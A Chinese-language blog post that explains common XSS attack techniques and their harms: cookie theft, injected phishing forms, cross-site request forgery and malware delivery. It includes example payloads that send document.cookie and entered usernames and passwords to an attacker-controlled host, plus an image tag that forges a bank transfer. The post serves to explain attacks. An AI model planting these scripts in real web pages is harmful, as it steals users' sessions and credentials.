关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

XSS攻击漏洞的手段及其危害

 feng  825 ℃  0条点评

由于XSS的隐蔽性及其攻击面的广泛性,使得利用XSS漏洞的各种攻击方式层出不穷,给我们普通的互联网用户带来了很大的危害。根据注入脚本代码的不同,XSS可以引导各种各样的攻击。下面将具体介绍几种目前互联网上常见的XSS攻击手段及其带来的危害。

1.窃取Cookie

         通过XSS攻击,由于注入代码是在受害者的浏览器上执行,因此能够很方便地窃取到受害者的Cookie信息。比如,我们只要注入类似如下的代码:

         <script>location.replace(“http://www.afeng.org/record.asp?secret=“+document.cookie)</script>

       当受害者的浏览器执行这段脚本的时候,就会自动访问攻击者建立的网站www.attackpage.com,打开其中的recourd.asp,将受害者浏览器的Cookie信息给记录下来。这样,攻击者就得到了用户的Cookie信息。

         得 到受害者的Cookie信息后,攻击者可以很方便地冒充受害者,从而拥有其在目标服务器上的所有权限,相当于受害者的身份认证被窃取了。这样,攻击者可以 任意地利用受害者的身份访问服务器上的资源和服务,甚至对受害者和服务器上的数据进行破坏。如果受害者拥有管理员权限,攻击者还可以利用其提升自己账号的 权限,从而进行进一步的攻击。

注:Cookie,有时也用其复数形式Cookies,指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)

2.引导钓鱼

         所谓钓鱼攻击就是构建一个钓鱼页面,诱骗受害者在其中输入一些敏感信息,然后将其发送给攻击者。利用XSS的注入脚本,我们也可以很方便地注入钓鱼页面的代码,从而引导钓鱼攻击。比如下面这样一段代码:

         <script>

function hack()

{

                   location.replace(“http://www.afeng.org/record.asp?username=“

+document.forms[0].user.value + “password=” + document.forms[0].pass.value);

}

</script>

<form>

<br><br><HR><H3>这个功能需要登录:</H3 >

<br><br>请输入用户名:<br>

<input type=”text” id=”user”name=”user”>

<br>请输入密码:<br>

<input type=”password” name =“pass”>

<br><input type=”submit”name=”login” value=”登录”onclick=”hack()”>

</form><br><br><HR>

    注 入上面的代码后,则会在原来的页面上,插入一段表单,要求用户输入自己的用户名和密码,而当用户点击“登录”按钮后,则会执行hack()函数,将用户的 输入发送到攻击者指定的网站上去。这样,攻击者就成功窃取了该用户的账号信息。可以看到,和一般的钓鱼攻击不同,XSS引导的钓鱼攻击由于是对用户信任的 网站页面进行修改,因此隐蔽性很高,而用户的账号失窃往往会带来重大的损失,因此它的危害也是十分巨大的。

3.跨站请求伪造

         跨 站请求伪造(Cross-SiteRequest Forgery,CSRF),作为OWASP组织的2007年提出十大安全漏洞第五,它也属于XSS攻击的一种衍生。所谓跨站请求伪造,就是攻击者利用 XSS注入攻击的方式,注入一段脚本,而当受害者的浏览器运行这段脚本时,脚本伪造受害者发送了一个合法请求。比如我们注入如下的HTML代码:

         <imgsrc = “http://www.afeng.org/transfer.do?toAct=123456&money=10000>

         假 如上面的代码中所访问的是某个银行网站的转账服务,则当受害者的浏览器运行这段脚本时,就会向攻击者指定的账户(示例的123456)执行转账操作。由于 这个转账请求是在受害者的浏览器中运行的,因此浏览器也会自动将受害者的Cookie信息一并发送。这样,发送的请求就好像是受害者自己发送的一样,银行 网站也将认可这个请求的合法性,攻击者也就达到了伪造请求的目的。

4.注入恶意软件

         除 了直接注入恶意脚本以外,通过XSS攻击,攻击者也可以很方便地在脚本中引入一些恶意软件,比如病毒、木马、蠕虫等等。例如,攻击者可以在某个自己建立的 页面上放置一些恶意软件,然后用XSS注入的方式,插入一段引用该页面的脚本。这样当受害者的浏览器执行这段脚本的时候,就会自动访问放置了恶意软件的页 面,从而受到这些恶意软件的感染。

         利用XSS注入恶意软件的方式,攻击者可以很方便地在互联 网上传播病毒、木马和蠕虫,通过这种途径,攻击者就可以通过这些病毒、木马和蠕虫,进一步地对受害者的主机发动攻击。目前,互联网上的“挂马”现象非常普 遍,而XSS注入的出现也无疑给“挂马”的攻击者指明了又一个新的方向。通过传播这些木马,窃取合法用户的敏感信息,不少非法攻击者也逐渐将这一过程产业 化,经常可以见到以信封方式批量兜售账号密码的现象。这也给许多正常的网络用户造成了许多无法挽回的巨大损失,造成的危害也很大。

XSS的漏洞查找与检测
最后谈XSS的预防
我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)某个商业定向攻击活动分析某个商业定向攻击活动分析

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码